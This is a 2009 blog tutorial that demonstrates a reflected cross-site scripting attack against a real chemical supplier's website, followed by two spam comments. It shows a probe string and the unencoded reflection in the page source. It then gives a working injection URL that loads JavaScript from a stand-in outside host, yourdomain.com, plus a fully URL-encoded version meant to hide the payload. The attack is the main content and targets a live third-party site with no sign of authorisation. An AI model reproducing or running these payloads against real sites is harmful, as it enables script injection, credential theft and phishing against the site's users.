This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 3, 2009

XSS 101 - SigmaAldrich.com

The target of my first post will be www.sigmaaldrich.com, the website of international chemical supplier Sigma-Aldrich. First take a look at the website itself and look for an input whose data may be displayed on the page after postback.



Fortunately for us, sigmaaldrich.com has a search option. Because search engines generally accept a wide array of characters and display some form of the original search string on the results page, they are an excellent attack vector for cross-site scripting. To see what sort of encoding the search goes through, we're going to use a special string:
testA.,:;\'"<>()[]{}


After searching for the string, view the source of the results page and search for testA within the code. The first result should look like the javascript below.

cmCreatePageviewTag("Result Page: Product Results","SS6", "Keyword (fulltext)|testA.,:;\'"<>()[]{}|", "2");

Here we can see an unencoded, exact match of our search within a javascript string. This means we have free reign to terminate the string (as was already done with the test string), finish the function call, and inject our own code. However, with access to less than and greater than characters, we should look further to see what else can be done. The next search string match is even more promising.

That Match Your Search for "testA.,:;\'"<>()[]{}"

We're still free of encoding, and with this instance of the search string we can easily inject an HTML script tag referencing a javascript file on another server. Our script, for the sake of testing purposes, only contains an alert. The code that will be injected is shown below.

<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>

Note that the address in this sample doesn't actually point to anything; you'll need to replace it with your own.

Next, in the URL of the results page we replace the search string with the code we want to inject. The result should look like this:

http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=mode+matchpartialmax&N4=<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>


When we navigate to this URL, an alert should pop up letting us know that our off site code has been successfully run.



To better hide the payload and enhance browser compatibility we can URL encode the javascript resulting in a link that would look similar to this:

http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%64%6F%6D%61%69%6E%2E%63%6F%6D%2F%74%65%73%74%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E


And that's it. XSS is a simple, powerful reminder to properly encode all user entered data.

4 comments:

  1. Beer is made by brewing. The essential stages of brewing are mashing, sparging, boiling, fermentation, and packaging. Most of these stages can be accomplished in several different ways, but the purpose of each stage is the same regardless of the method used to achieve it.

    custom seat covers
    Nashville lofts

    ReplyDelete
  2. it is very nice article thanks for sharing this article to us , it is very nice article ,
    i really like like this article because i got good info about this article thanks for sharing this article to us best regards.
    sap netweaver online training

    ReplyDelete